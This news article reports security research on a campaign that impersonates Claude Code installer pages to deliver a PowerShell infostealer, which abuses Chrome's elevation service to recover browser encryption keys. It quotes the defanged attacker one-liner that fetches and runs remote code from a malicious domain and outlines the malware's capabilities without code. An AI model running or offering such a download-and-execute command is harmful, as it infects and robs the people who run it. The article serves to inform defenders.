Developers looking for Anthropic’s increasingly popular Claude Code tool are now being lured into downloading malware.
According to researchers at Ontinue, attackers are abusing a fake Claude Code installer to deliver a previously undocumented PowerShell payload. The malware is designed to evade detection, recover browser encryption material, and steal sensitive data from developer systems.
“Developers hold the keys to an organization’s most sensitive assets – intellectual property, cloud infrastructure, CI/CD pipelines,” said Vineeta Sangaraju, AI Research Engineer at Black Duck. “They also, by necessity, need the freedom to download and install software. That combination makes them a high-value target.”
Ontinue researchers said that everything possibly detectable on the attack chain is wrapped within the PowerShell loader, complicating detection. “Two standard API-chain rule sets we evaluated against the binary returned no matches,” they said in a blog post.
The malware has “geographic exclusion” enabled, which has it scan the host’s Windows regions settings against a list of to-exclude geographies, namely all the CIS member states and Iran, and immediately abort execution if there’s a match.
Campaign replaces Claude Code’s legitimate one-line setup
According to Ontinue, the campaign depends on fake installer pages impersonating Claude Code distribution channels. However, rather than delivering Anthropic’s legitimate one-line installation routine, “irm https[:]//claude[.]ai/install.ps1 | iex,” the pages serve attacker-controlled PowerShell commands (“irm events[.]msft23[.]com | iex”) that initiate a staged payload chain.
Once executed, the malicious routine deploys multiple components intended to establish persistence while minimizing behavioral indicators typically associated with commodity malware loaders.
“Everything readily detected, SQLite database access, archive construction, HTTPS exfiltration, scheduled-task persistence, and the process-injection chain itself, resides exclusively within the PowerShell loader,” the researchers said, adding that the native helper exposes no networking, cryptographic, or file-enumeration imports.
The only telling sign is a single indirect COM vtable invocation, they noted.
A list of things the malware can do, while hiding from the prying eyes, includes geographic exclusion, ID collection, browser enumeration, v10/v20 key handling, PowerShell architecture matching and launch, decryption and collection, exfiltration, and persistence.
“Swapping a legitimate installer for a malicious one is not a new attack,” Sangaraju pointed out. “However, what makes this ongoing campaign notable is the precision with which it was built to evade the detection methods that most security teams rely on today. The malicious activity is deliberately structured to look benign to scanners.”
Chrome elevation services were abused to crack encryption
The researchers also wrote of the malware abusing Chrome Elevation Services to recover encryption material associated with Application-Bound Encryption (ABE) protections. The payload leverages the IElevator2 COM interface in Chrome to retrieve (ABE) encryption keys.
This capability helped attackers access browser-protected data normally inaccessible by infostealers. Google introduced ABE in Chrome 127 in July 2024, specifically to keep commodity stealers from lifting cookies and saved passwords from the SQLite databases.
Ontinue stopped short of making firm attribution claims as it found no match with published TTPs associated with popular families like Lumma, StealC, Vidar, EDDIESTEALER, Katz, VoidStealer, Storm, and XenoSteler, among others. The closest the researchers got to a match was with Glove Stealer, which also abuses IElevator, but they dismissed a direct attribution, citing six differing aspects.
A YARA ruleset and a set of indicators of compromise (IOCs) were shared through GitHub repositories to support detection, with researchers recommending an additional set of best practices. These included enforcing PowerShell Constrained Language Mode, enabling phishing-resistant MFA authentication, enabling and verifying AMSI tamper protection, and blocking newly registered domains.
No Responses